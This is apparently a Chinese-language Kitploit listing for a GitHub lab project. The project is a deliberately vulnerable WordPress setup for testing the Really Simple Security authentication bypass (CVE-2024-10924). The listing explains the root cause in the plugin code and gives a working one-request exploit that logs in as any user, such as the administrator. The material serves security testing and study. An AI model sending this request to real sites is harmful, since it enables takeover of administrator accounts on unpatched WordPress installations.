Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
wordpress-really-simple-security-authn-bypass-vulnerable-application — 警告:这是一个存在漏洞的应用程序,用于测试 Really Simple Security < 9.1.2 身份验证绕过漏洞(CVE-2024-10924)。请自担风险运行! | Kitploit
工具/GitHubGitHub/m3ssap0/wordpress-really-simple-security-authn-bypass-vulnerable-application
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试身份验证实验室与实践
GitHubm3ssap0/wordpress-really-simple-security-authn-bypass-vulnerable-application

wordpress-really-simple-security-authn-bypass-vulnerable-application

警告:这是一个存在漏洞的应用程序,用于测试 Really Simple Security < 9.1.2 身份验证绕过漏洞(CVE-2024-10924)。请自担风险运行!

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
81年前尚未审核

wordpress-really-simple-security-authn-bypass-vulnerable-application

这是一个用于测试Really Simple Security < 9.1.2 身份验证绕过漏洞(CVE-2024-10924)的易受攻击的应用程序。

警告!

此应用程序包含严重安全漏洞。运行风险自负!建议使用已备份且隔离的环境(例如具有最近快照和仅主机网络的虚拟机)。请勿将此应用程序上传到任何面向互联网的服务器,否则将会被入侵。

免责声明:我不对任何人使用此应用程序的方式负责。此应用程序的唯一目的是为Really Simple Security < 9.1.2 身份验证绕过漏洞(CVE-2024-10924)的利用提供测试场景,不得恶意使用。如果您的服务器因安装此应用程序而被入侵,这不是我的责任,而是上传和安装它的人的责任。

漏洞信息

  • CVE-ID: CVE-2024-10924
  • Link: https://www.cve.org/CVERecord?id=CVE-2024-10924
  • 描述: 这使得当启用“双因素认证”设置(默认禁用)时,未经身份验证的攻击者可以以站点上任何现有用户(例如管理员)的身份登录。
  • 修复: https://plugins.trac.wordpress.org/changeset/3188431/really-simple-ssl
  • Wordfence公告: https://www.wordfence.com/threat-intel/vulnerabilities/detail/really-simple-security-free-pro-and-pro-multisite-900-9111-authentication-bypass

使用方法

以下是设置环境的步骤:

  1. 运行 ./up.sh 启动容器组合。
  2. 在此处完成WordPress安装:https://localhost:1337/wp-admin/install.php。
  3. 登录WordPress。
  4. 转到“插件”:https://localhost:1337/wp-admin/plugins.php。
  5. 点击“Really Simple Security”插件下的“激活”。不要更新它,因为我们需要有漏洞的版本。
  6. 在弹出的SSL激活窗口中点击“取消”。
  7. 转到“设置” > “登录保护” > “双因素认证”,然后在“双因素认证”部分,启用“启用双因素认证”。
  8. 点击“保存”按钮。

容器将被命名为 vuln-wp-really-simple-security。

要拆除环境,请使用 ./down.sh 命令,或使用 ./down_and_delete.sh 命令同时移除镜像和数据库卷。

根本原因

查看修复,可以理解在易受攻击的版本中,如果登录nonce无效,check_login_and_get_user()函数返回了一个错误对象,但并未中止整个操作。

root@kitploit:~
private function check_login_and_get_user( int $user_id, string $login_nonce ) {
    if ( ! Rsssl_Two_Fa_Authentication::verify_login_nonce( $user_id, $login_nonce ) ) {
        return new WP_REST_Response( array( 'error' => 'Invalid login nonce' ), 403 );
    }

    /**
     * Get the user by the user ID.
     *
     * @var WP_User $user
     */
    $user = get_user_by( 'id', $user_id );
    return $user;
}

然而,在调用方,没有对check_login_and_get_user()函数的输出进行任何检查(第277行),而是直接使用从输入接收到的相同用户ID值,继续使用authenticate_and_redirect()函数(第278行)。

root@kitploit:~
public function skip_onboarding( WP_REST_Request $request ): WP_REST_Response {
	$parameters = new Rsssl_Request_Parameters( $request );
	// As a double we check the user_id with the login nonce.
	$user = $this->check_login_and_get_user( (int)$parameters->user_id, $parameters->login_nonce );
	return $this->authenticate_and_redirect( $parameters->user_id, $parameters->redirect_to );
}

利用方法

要利用此漏洞,以下请求就足够了。

root@kitploit:~
POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
Host: localhost:1337
Content-Type: application/json
Content-Length: 88
Connection: keep-alive

{
    "user_id": 1,
    "login_nonce": "133333337",
    "redirect_to": "/wp-admin/"
}

然后在浏览器中相应地设置返回的会话cookie。

user_id必须为目标用户的ID,login_nonce可以是任何值,因为错误的值不会阻止进程。

可以在此处找到用Python编写的利用脚本。

作者

  • Antonio Francesco Sardella - 实现 - m3ssap0

许可证

本项目基于Unlicense许可证发布 - 详情请参阅LICENSE文件。

致谢

  • István Márton,发现此漏洞的安全研究员。
下载工具